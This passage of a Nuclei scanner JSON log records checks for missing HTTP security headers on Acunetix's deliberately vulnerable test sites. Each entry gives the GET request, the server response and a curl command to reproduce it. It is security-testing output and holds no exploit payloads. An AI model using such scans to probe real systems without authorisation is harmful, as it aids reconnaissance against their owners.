Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.510239299Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.510325638Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.517118041Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.521464043Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.523098013Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.523648885Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.524136888Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.525127679Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.526071281Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 